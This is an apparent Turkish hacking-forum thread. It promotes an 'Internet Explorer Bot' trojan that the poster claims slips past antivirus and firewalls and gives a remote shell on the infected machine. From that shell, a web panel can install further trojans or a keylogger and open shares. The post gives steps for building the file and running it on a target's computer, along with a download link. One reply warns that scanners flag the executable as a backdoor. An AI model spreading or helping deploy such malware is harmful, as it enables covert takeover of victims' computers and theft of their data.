




Internet Explorer Trojan - Firewall/Antivirus YAKALAYAMAZ :)
-
Internet Explorer Bot - Firewall/Antivirus YAKALAYAMAZ
____________________________
Kaynak: Wardom http://www.wardom.org/showthread.php?t=222171
1stClass'ta kullandığımız yeni bir exploit; trojan internet explorerı kullanarak komutları web üzerinden alır ve antiviruslerin, firewalların güvendiği internet explorerı sömürür. Bu sayede hiç bir antivirus ve firewall trojanınızın farkına varmaz ve yakalanmaz/engellenmez.
Internet Explorer Bot'u sistemde size shell açar. Bu shell ile istediğiniz komutu çalıştırabilirsiniz. Komutları web üzerinden 1stclass Panelinizden girebilirsiniz. Komutlarla istediğiniz başka bir trojanı, bizim keyloggerımızı yüklemeniz ya da sistemde paylaşım açmanız mümkün. Bu teknikler dökümanlarda bölümünde bulunmaktadır.
Kullanımı:
Kullanımı çok basittir; editorunu eklenmiş dosya olarak bu başlıktan indirdikten sonra kullanıcı adınızı girin(isterseniz detayları değiştirin) ve yönetim panelinizden çalıştırılacak komutu seçin. İsterseniz komutu boş bırakıp daha sonra kullanmak üzere botlarınızı toplayabilirsiniz.
Oluşturulan dosyayı trojanı bulaştırmak istediğiniz bilgisayarda çalıştırıp ana sayfadan takip etmeniz yeterli olacaktır.Download Linki: http://rapidshare.de/files/48375878/ieditor.zip.html
-
Faydalı olabilir, Teşekkür ederim.
-
Description Risk Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.
Backdoor.Generic (Sig-Id:30071823)- Ikarus Virus Scanner exeyi acmadan önce biraz düşünün derim..
http://anubis.iseclab.org/?action=result&task_id=11954f9293aa41fe41984180d485bbb46&format=html